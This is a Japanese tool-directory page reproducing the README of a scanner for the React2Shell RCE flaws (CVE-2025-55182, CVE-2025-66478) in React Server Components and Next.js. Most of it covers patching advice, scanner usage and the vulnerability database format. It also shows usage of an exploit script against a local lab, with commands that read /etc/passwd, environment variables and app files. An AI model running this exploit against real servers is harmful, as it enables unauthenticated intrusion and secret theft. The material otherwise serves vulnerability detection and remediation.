Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
react2shell-scanner-rce-react-next-CVE-2025-55182-CVE-2025-66478 — CVE-2025-55182(React)およびCVE-2025-66478(Next.js)のスキャナー - react-server-dom-webpack、react-server-dom-parcel、react-server-dom-turbopack、およびNext.jsのようなRSC対応フレームワークに影響を与える重大なReact Server Components(RSC)/ Flightプロトコルの脆弱性キャンペーンを追跡・修正します。 | Kitploit
ツール/GitHubGitHub/security-phoenix-demo/react2shell-scanner-rce-react-next-cve-2025-55182-cve-2025-66478
脆弱性スキャナーウェブ脆弱性スキャナーコード分析エクスプロイトウェブセキュリティペネトレーションテストサプライチェーンセキュリティ学習と教育ラボと実践
GitHubsecurity-phoenix-demo/react2shell-scanner-rce-react-next-cve-2025-55182-cve-2025-66478

react2shell-scanner-rce-react-next-CVE-2025-55182-CVE-2025-66478

CVE-2025-55182(React)およびCVE-2025-66478(Next.js)のスキャナー - react-server-dom-webpack、react-server-dom-parcel、react-server-dom-turbopack、およびNext.jsのようなRSC対応フレームワークに影響を与える重大なReact Server Components(RSC)/ Flightプロトコルの脆弱性キャンペーンを追跡・修正します。

リポジトリを見る
6346ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🔍 Phoenix SCA Scanner - Universal - Version for CVE-2025-55182-CVE-2025-66478 React and Nexus Vulnerability

React2Shell バグクラスに関する 外部脆弱性: React Server Components (RSC) の "Flight" プロトコルにおいて、新たに公開された 認証不要のリモートコード実行脆弱性 が2件あります—CVE-2025-55182 (React) および CVE-2025-66478 (Next.js)、いずれも CVSS 10.0 と評価されています。これらの問題は、RSC/Server Function エンドポイントが攻撃者制御の Flight ペイロードをデコードする方法に起因し、単一の細工された HTTP リクエストをサーバーサイドコード実行に変える可能性があります—App Router と本番ビルドを使用する「デフォルト」の最新 React/Next.js スタックでも発生します。多くのチームにとって、これは「今すぐパッチを当て、露出を確認し、その後監査する」べき瞬間であり、後日の依存関係管理スプリントに先送りすべきではありません。

LAB フォルダには React2Shell 向けのエクスプロイトとラボの脆弱性が含まれています。

このプロジェクトは 二段階アプローチ を提供します: (1) ソフトウェア構成・依存関係リスクスキャニング (本ツール) により、脆弱なライブラリとバージョンを迅速に特定し、(2) Web DAST スキャナー (React2Shell Web Scanner) により、外部から RSC/Flight エンドポイントを能動的にプローブし、実行環境で悪用可能なパスが到達可能か検証します。これらを組み合わせることで、「脆弱なコンポーネントはどこにあるか?」 と 「本番環境で実際に悪用される可能性があるのはどこか?」 の両方に答え、自信を持ってパッチ適用、堅牢化、インシデント対応の優先順位を付けられます。


🌐 Web スキャナー - React2Shell RCE 検出

ライブエンドポイントテスト と RCE 検証 については、専用の Web スキャナーを参照:

📁 web-scan_CVE-2025-66478/ - 完全なドキュメントとガイド

クイックスタート - Web スキャナー

root@kitploit:~
cd web-scan_CVE-2025-66478

# Install dependencies
pip install -r requirements.txt

# Scan a single target
python3 react2shell-scanner -u https://target.com -v

# Scan with evidence display
python3 react2shell-scanner -u https://target.com --show-evidence

# Batch scan with all export formats
python3 react2shell-scanner -l targets.txt -o results.json --csv results.csv --html report.html

# Test the exploit on vulnerable target (requires Python 3.11+)
python3.11 test-lab/exploit.py -u http://vulnerable-host:3000 -c "hostname"

Web スキャナーの機能

機能説明
🔍 RCE 検出算術ベースの安全な検出(副作用なし)
🎯 テクノロジーフィンガープリンティングNext.js/React アプリケーションの自動検出
📊 マルチフォーマットエクスポートJSON、CSV、HTML レポート
🔗 IOC 相関31 以上の既知の悪意ある IP との照合
🌐 スケールスキャンCIDR レンジ、サブドメイン列挙
☁️ Phoenix 統合発見結果を Phoenix Security にアップロード
💻 エクスプロイトツール脆弱なターゲット上でコマンドを実行

テストラボのセットアップ

root@kitploit:~
cd web-scan_CVE-2025-66478/test-lab/lab

# Start vulnerable (3011) and patched (3012) instances
docker-compose up -d

# Test vulnerable instance
python3 react2shell-scanner -u http://localhost:3011 --show-evidence

エクスプロイト例 (Python 3.11+ 必須)

root@kitploit:~
cd web-scan_CVE-2025-66478/test-lab

# Install exploit dependencies
pip3.11 install -r requirements.txt

# Basic command execution
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# Output: nextjs

python3.11 exploit.py -u http://localhost:3011 -c "id"
# Output: uid=1001(nextjs) gid=65533(nogroup)

python3.11 exploit.py -u http://localhost:3011 -c "hostname"  
# Output: 99e28775bf80 (container ID)

# System enumeration
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env"

# Application recon
python3.11 exploit.py -u http://localhost:3011 -c "pwd"           # /app
python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"

🛡 React2Shell / Flight プロトコル RCE – 脆弱性概要

React2Shell は、React Server Components (RSC) の Flight プロトコルにおけるペイロード処理に対する、認証不要のリモートコード実行プリミティブです。実際には、悪意のあるクライアントが単一の細工された HTTP リクエストを RSC/Server Function エンドポイントに送信し、脆弱なバージョンが動作している場合、「Web アプリ」を「サーバーシェル」に変える可能性があります。

概要:

  • 攻撃者制御の Flight ペイロード が、RSC / Server Function 処理に関与するエンドポイント(例:Next.js App Router デプロイメント)に送信されます。
  • サーバーは React の Flight デコードおよびデシリアライズロジックを使用して、そのペイロードをサーバーサイドのデータと命令に戻します。
  • このレイヤーでの 安全でないデシリアライズ により、攻撃者はサーバーサイドの実行に影響を与え、完全な リモートコード実行 (RCE) にエスカレーションできます。

これは 認証不要の RCE であるため、デフォルトの本番セットアップが対象範囲に含まれます。明示的に "サーバー関数" を記述したことがなく、最新の React/Next.js パターンを採用しただけの場合でも同様です。ホスティングレベルの軽減策や汎用 WAF を主要な安全策として扱うべきではありません。露出を減らすことはできても、脆弱なライブラリを確実に補償することはできません。これをインシデントとして扱ってください:

  • パッチ適用: React RSC サーバー DOM パッケージと Next.js を修正リリースに更新。
  • 露出の確認: コードベースと SBOM をスキャンして脆弱なバージョンがないか確認。
  • 監査: RSC/Flight 関連エンドポイントへの不審なリクエストをログで確認し、侵害が疑われる場合はシークレットをローテーション。

攻撃者が React2Shell を介して RCE を達成した場合、ディフェンダーは以下のよく知られたキルチェーンを想定すべきです:

  • 環境の調査 – ランタイム、ファイルシステム構成、環境変数、クラウドメタデータエンドポイントを列挙。
  • シークレットの探索 – .env ファイル、デプロイ用シークレット、CI トークン、サービス認証情報、署名キーを収集。
  • 永続化 – ウェブシェル的なアーティファクトの配置、サーバーサイドコードの変更、可能な場合はスケジュールタスクの埋め込み。
  • 横移動 – 内部サービス、データベース、キュー、クラウド管理 API へのピボット。
  • サプライチェーンへの波及 – ビルドまたはデプロイの認証情報があれば、CI/CD やアーティファクトレジストリへ「上流」に移動。

DevSecOps パイプラインがこれまで Web 層を「単なるフロントエンド」として扱ってきた場合、この脆弱性は、RSC とストリーミングセマンティクスが関与する場合、フロントエンドフレームワークが深刻なサーバーサイドの爆発半径を持つ可能性がある という具体的な実証となります。Universal Vulnerability Scanner は、「脆弱なパッケージをどこかで実行していないか?」を迅速に回答し、その回答を Phoenix 主導のキャンペーンや、まもなく提供される Web DAST 検証 によるライブ RSC エンドポイントの補完的な検証にフィードするために存在します。

🎯 機能

SCA スキャナー (本ツール)

  • ✅ マルチエコシステム対応 - NPM(PyPI、Ruby Gems などへの拡張性あり)
  • ✅ インテリジェントなバージョン照合 - 範囲ベースの検出を伴う Semver 解析
  • ✅ React Server Components (RSC) 検出 - RSC 脆弱性に特化した検出
  • ✅ ロックファイル対応 - package-lock.json、yarn.lock、pnpm-lock.yaml を解析
  • ✅ Phoenix 統合 - 発見結果を Phoenix Security プラットフォームにアップロード
  • ✅ 包括的なテスト - 検証用のサンプル脆弱パッケージ
  • ✅ JSON/テキストレポート - 柔軟な出力形式
  • ✅ CLI インターフェース - 使いやすいコマンドラインツール

Web スキャナー (web-scan_CVE-2025-66478/)

  • ✅ ライブ RCE 検出 - 安全な算術ベースの脆弱性確認
  • ✅ エクスプロイトツール - 脆弱なターゲット上でコマンドを実行
  • ✅ IOC データベース - 31 以上の悪意ある IP、16 以上の攻撃パターン
  • ✅ スケールスキャン - CIDR レンジ、サブドメイン列挙、バッチスキャン
  • ✅ 証拠収集 - 完全なリクエスト/レスポンスキャプチャ、HTML レポート
  • ✅ テストラボ - Docker ベースの脆弱/修正済み環境

📦 インストール

root@kitploit:~
# Install dependencies
pip install -r requirements.txt

# Run from project root
python -m universal_vulnerability_scanner.main --help

🚀 クイックスタート

1. プロジェクトのスキャン

root@kitploit:~
# Basic scan
python -m universal_vulnerability_scanner.main scan /path/to/project

# With JSON output
python -m universal_vulnerability_scanner.main scan /path/to/project --json --output results.json

# Quiet mode (only show summary)
python -m universal_vulnerability_scanner.main scan /path/to/project --quiet

2. Phoenix Security へのアップロード

root@kitploit:~
# Create Phoenix configuration template
python -m universal_vulnerability_scanner.main create-config

# Edit .phoenix.config with your credentials
# Then scan and upload
python -m universal_vulnerability_scanner.main scan /path/to/project --upload-phoenix

3. テストの実行

root@kitploit:~
# Test with included vulnerable samples
python -m universal_vulnerability_scanner.main test

📋 脆弱性データベース

スキャナーは JSON ベースの脆弱性データベースを使用します。場所:

root@kitploit:~
universal_vulnerability_scanner/data/vulnerability_database.json

サポートされている脆弱性

React Server Components (RSC)

  • react-server-dom-webpack - バージョン: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel - バージョン: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack - バージョン: 19.0.0, 19.1.0, 19.1.1, 19.2.0

React コア

  • react - 脆弱範囲: [19.0.0, 19.0.1), [19.1.0, 19.1.2), [19.2.0, 19.2.1)
  • react-dom - react と同じ脆弱範囲

Next.js

  • next - 脆弱範囲: [15.0.0, 15.0.5), [16.0.0, 16.0.7)

データベース形式

root@kitploit:~
{
  "metadata": {
    "version": "1.0.0",
    "last_update": "2025-12-04",
    "ecosystems": ["npm"]
  },
  "vulnerabilities": {
    "npm": {
      "package-name": {
        "exact_versions": ["1.0.0", "1.0.1"],
        "vulnerable_ranges": [
          {"min": "1.0.0", "max": "1.0.2", "severity": "CRITICAL"}
        ],
        "safe_versions": ["1.0.2+"],
        "cve_ids": ["CVE-2025-XXXX"],
        "description": "Vulnerability description",
        "references": ["https://..."]
      }
    }
  }
}

🔧 設定

Phoenix Security 統合

.phoenix.config を作成:

root@kitploit:~
[phoenix]
client_id = your_client_id_here
client_secret = your_client_secret_here
api_base_url = https://api.securityphoenix.cloud
assessment_name = Universal Vulnerability Scanner - RSC Detection
import_type = new

または環境変数を使用:

root@kitploit:~
export PHOENIX_CLIENT_ID="your_client_id"
export PHOENIX_CLIENT_SECRET="your_client_secret"
export PHOENIX_API_URL="https://api.securityphoenix.cloud"

📊 出力形式

テキストレポート

root@kitploit:~
================================================================================
UNIVERSAL VULNERABILITY SCANNER REPORT
================================================================================
Scan completed: 2025-12-04 10:30:00

SUMMARY:
----------------------------------------
Total findings: 12
  VULNERABLE:  3
  SAFE:        2
  CLEAN:       5
  REVIEW:      2

🚨 VULNERABLE PACKAGES DETECTED
================================================================================

1. [email protected]
   File: /path/to/project/package.json
   Reason: Exact match with known vulnerable version 19.0.0
   ✅ Safe version: 18.99.99
   CVE: CVE-2025-RSC-001

JSON レポート

root@kitploit:~
[
  {
    "path": "/path/to/project/package.json",
    "kind": "package.json",
    "package": "react-server-dom-webpack",
    "version": "19.0.0",
    "verdict": "VULNERABLE",
    "reason": "Exact match with known vulnerable version 19.0.0",
    "severity": "CRITICAL",
    "vulnerable_versions": ["19.0.0", "19.1.0", "19.1.1", "19.2.0"],
    "safe_version": "18.99.99",
    "cve_ids": ["CVE-2025-RSC-001"],
    "timestamp": "2025-12-04T10:30:00"
  }
]

🧪 テストサンプル

スキャナーには test_samples/ に包括的なテストサンプルが含まれています:

テストケース説明期待される結果
rsc_vulnerable_exact/正確な脆弱バージョン4 VULNERABLE
rsc_vulnerable_range/バージョン範囲4 VULNERABLE
rsc_safe_versions/パッチ適用済みの安全なバージョン6 SAFE
rsc_mixed/脆弱/安全/クリーンの混合2 VULNERABLE, 1 SAFE, 4 CLEAN
rsc_with_lockfile/ロックファイル解析2 VULNERABLE, 1 CLEAN

テストの実行:

root@kitploit:~
python -m universal_vulnerability_scanner.main test

🏗️ アーキテクチャ

root@kitploit:~
universal_vulnerability_scanner/
├── core/
│   └── version_parser.py       # Semver 解析と比較
├── models/
│   ├── finding.py              # 発見結果データモデル
│   └── vulnerability.py        # 脆弱性データベースモデル
├── scanners/
│   ├── base_scanner.py         # 抽象スキャナーインターフェース
│   └── npm_scanner.py          # NPM エコシステムスキャナー
├── integrations/
│   └── phoenix_uploader.py     # Phoenix API クライアント
├── data/
│   └── vulnerability_database.json  # 脆弱性定義
├── test_samples/               # テストケース
└── main.py                     # CLI エントリポイント

🔐 セキュリティに関する考慮事項

  1. 誤検知なし: スキャナーは慎重側に倒れます
  2. バージョン正規化: NPM バージョン指定子 (^, ~, =) を処理
  3. 範囲検出: バージョン範囲内の脆弱性を検出
  4. ロックファイル優先: ロックファイルから解決済みバージョンを優先
  5. 安全なバージョンの推奨: アップグレードパスを提案

🚀 スキャナーの拡張

新しいエコシステムの追加

  1. scanners/ に BaseScanner を継承した新しいスキャナーを作成
  2. エコシステム固有の解析を実装
  3. データベースに新しいエコシステムキーの下に脆弱性を追加

例:

root@kitploit:~
from .base_scanner import BaseScanner

class PyPIScanner(BaseScanner):
    def _get_ecosystem(self) -> str:
        return "pypi"
    
    def scan_path(self, root: Path) -> List[Finding]:
        # Implement PyPI scanning logic
        pass

新しい脆弱性の追加

data/vulnerability_database.json を編集:

root@kitploit:~
{
  "npm": {
    "new-vulnerable-package": {
      "exact_versions": ["1.0.0"],
      "vulnerable_ranges": [{"min": "1.0.0", "max": "1.0.5", "severity": "HIGH"}],
      "safe_versions": ["1.0.5+"],
      "cve_ids": ["CVE-2025-XXXX"],
      "description": "Vulnerability description"
    }
  }
}

📈 終了コード

  • 0 - スキャン成功、脆弱性なし
  • 1 - スキャン成功、脆弱性あり
  • 2 - スキャン失敗(無効な入力、データベースエラーなど)

🤝 既存システムとの統合

Phoenix Security プラットフォーム

発見結果を自動的に Phoenix にアップロード:

  • スキャンされたリポジトリごとにアセットを作成
  • CVSS スコアリング付きの脆弱性発見結果
  • 分類のためのタグ
  • CVE 参照

CI/CD パイプライン

root@kitploit:~
# Example GitHub Actions
- name: Vulnerability Scan
  run: |
    python -m universal_vulnerability_scanner.main scan . --json --output scan-results.json
    
- name: Upload to Phoenix
  if: always()
  run: |
    python -m universal_vulnerability_scanner.main scan . --upload-phoenix

📝 変更履歴

v1.0.0 (2025-12-04)

  • 初回リリース
  • ロックファイル対応の NPM スキャナー
  • React Server Components 脆弱性検出
  • Phoenix Security 統合
  • 包括的なテストスイート

🙏 謝辞

  • Semver 解析は react/rsc_exposure_scanner.py から適用
  • Phoenix 統合は enhanced_npm_compromise_detector_phoenix.py から適用
  • 包括的なサプライチェーンセキュリティのために構築

📄 ライセンス

Shai Halud セキュリティツールキットの一部です。


🔍 安全を保ちましょう!脆弱性は責任を持って報告してください!

ツールをダウンロード